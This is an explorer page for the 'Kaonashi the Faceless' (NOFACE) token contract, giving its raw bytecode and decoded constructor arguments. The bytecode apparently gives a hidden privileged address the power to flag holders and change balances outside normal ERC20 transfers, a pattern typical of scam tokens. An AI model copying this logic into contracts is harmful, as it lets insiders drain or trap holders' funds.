00000000000000000000000000000000000000000000000000000000000000000000000000064e4f464143450000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806390ec57f11161006657806390ec57f1146101b057806395d89b41146101c3578063a9059cbb146101cb578063dd62ed3e146101de57600080fd5b806370a0823114610164578063715018a61461018d5780638da5cb5b1461019557600080fd5b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011557806323b872dd14610127578063313ce5671461013a578063566887001461014f575b600080fd5b6100dc610217565b6040516100e99190610ac3565b60405180910390f35b610105610100366004610b2d565b6102a9565b60405190151581526020016100e9565b600a545b6040519081526020016100e9565b610105610135366004610b57565b6102c0565b60095460405160ff90911681526020016100e9565b61016261015d366004610b2d565b610329565b005b610119610172366004610b93565b6001600160a01b031660009081526001602052604090205490565b610162610485565b6000546040516001600160a01b0390911681526020016100e9565b6101056101be366004610b2d565b6104eb565b6100dc610516565b6101056101d9366004610b2d565b610525565b6101196101ec366004610bae565b6001600160a01b03918216600090815260036020908152604080832093909416825291909152205490565b60606007805461022690610be1565b80601f016020809104026020016040519081016040528092919081815260200182805461025290610be1565b801561029f5780601f106102745761010080835404028352916020019161029f565b820191906000526020600020905b81548152906001019060200180831161028257829003601f168201915b5050505050905090565b60006102b6338484610545565b5060015b92915050565b60006102cd84848461066d565b61031f843361031a85604051806060016040528060298152602001610ca2602991396001600160a01b038a16600090815260036020908152604080832033845290915290205491906107ff565b610545565b5060019392505050565b336001600160a01b0383166103595760405162461bcd60e51b815260040161035090610c15565b60405180910390fd5b6000821161039a5760405162461bcd60e51b815260206004820152600e60248201526d125b9d985b1a5908185b5bdd5b9d60921b6044820152606401610350565b6004546000906103b49085906001600160a01b031661082b565b15610405576103c382826108b6565b6103cd81846108fa565b6001600160a01b0385166000908152600160205260408120805492935083929091906103fa908490610c54565b9091555061043d9050565b61040f82826108b6565b6001600160a01b03841660009081526001602052604081208054839290610437908490610c54565b90915550505b604080516001600160a01b0386168152602081018590527fe7fe080b09a4b64ca6809c33d36a0b2c9076c373e7f9da7b5f19cef93fc87e50910160405180910390a150505050565b6000546001600160a01b031633146104df5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610350565b6104e96000610919565b565b6000338061050b5760405162461bcd60e51b815260040161035090610c15565b61031f818585610969565b60606008805461022690610be1565b60006102b633848461066d565b600061053e8284610c54565b9392505050565b6001600160a01b0383166105a95760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610350565b6001600160a01b03821661060b5760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610350565b6001600160a01b0383811660008181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6106778382610a09565b6001600160a01b0383166106dc5760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610350565b6001600160a01b03821661073e5760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610350565b61077b81604051806060016040528060278152602001610c7b602791396001600160a01b03861660009081526001602052604090205491906107ff565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546107ab908290610c54565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106609085815260200190565b600081848411156108235760405162461bcd60e51b81526004016103509190610ac3565b505050900390565b6040516bffffffffffffffffffffffff19606084901b1660208201526000908190603401604051602081830303815290604052805190602001209050600083604051602001610892919060609190911b6bffffffffffffffffffffffff1916815260140190565b60408051601f19818403018152919052805160209091012091909114949350505050565b6001600160a01b0382166000908152600160205260409020546108da908290610c67565b6001600160a01b0390921660009081526001602052604090209190915550565b600081156109135761090c8284610c54565b90506102ba565b50919050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6004546109809084906001600160a01b031661082b565b15610a04576001600160a01b0382166109ab5760405162461bcd60e51b815260040161035090610c15565b80156109dd57506001600160a01b0316600081815260026020526040902080546001600160a01b031916909117905550565b6001600160a01b038216600090815260026020526040902080546001600160a01b03191690555b505050565b6001600160a01b038083166000908152600260205260408120549091610a319185911661082b565b15610a81576001600160a01b038316600090815260016020526040902054610a5a908290610c54565b6001600160a01b03841660009081526001602052604090205550600a54610a0483826108b6565b6001600160a01b038316600090815260016020526040902054610aa5908290610c54565b6001600160a01b038416600090815260016020526040902055505050565b600060208083528351808285015260005b81811015610af057858101830151858201604001528201610ad4565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610b2857600080fd5b919050565b60008060408385031215610b4057600080fd5b610b4983610b11565b946020939093013593505050565b600080600060608486031215610b6c57600080fd5b610b7584610b11565b9250610b8360208501610b11565b9150604084013590509250925092565b600060208284031215610ba557600080fd5b61053e82610b11565b60008060408385031215610bc157600080fd5b610bca83610b11565b9150610bd860208401610b11565b90509250929050565b600181811c90821680610bf557607f821691505b60208210810361091357634e487b7160e01b600052602260045260246000fd5b6020808252600f908201526e496e76616c6964206164647265737360881b604082015260600190565b634e487b7160e01b600052601160045260246000fd5b808201808211156102ba576102ba610c3e565b818103818111156102ba576102ba610c3e56fe4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212208d56974c43b4a1eef3a130d2221157760d5754a6745f95aae0b9957def60b4de64736f6c63430008100033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000ea1bcb83178ea09a0f96c05251c2ccadbd89450300000000000000000000000000000000000000000000000000000019debd01c700000000000000000000000000000000000000000000000000000000000000154b616f6e617368692074686520466163656c657373000000000000000000000000000000000000000000000000000000000000000000000000000000000000064e4f464143450000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): Kaonashi the Faceless
Arg [1] : symbol_ (string): NOFACE
Arg [2] : token_ (address): 0xea1BCb83178Ea09a0f96C05251C2ccadBD894503
Arg [3] : totalSupply_ (uint256): 111111111111

-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 000000000000000000000000ea1bcb83178ea09a0f96c05251c2ccadbd894503
Arg [3] : 00000000000000000000000000000000000000000000000000000019debd01c7
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000015
Arg [5] : 4b616f6e617368692074686520466163656c6573730000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [7] : 4e4f464143450000000000000000000000000000000000000000000000000000


Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.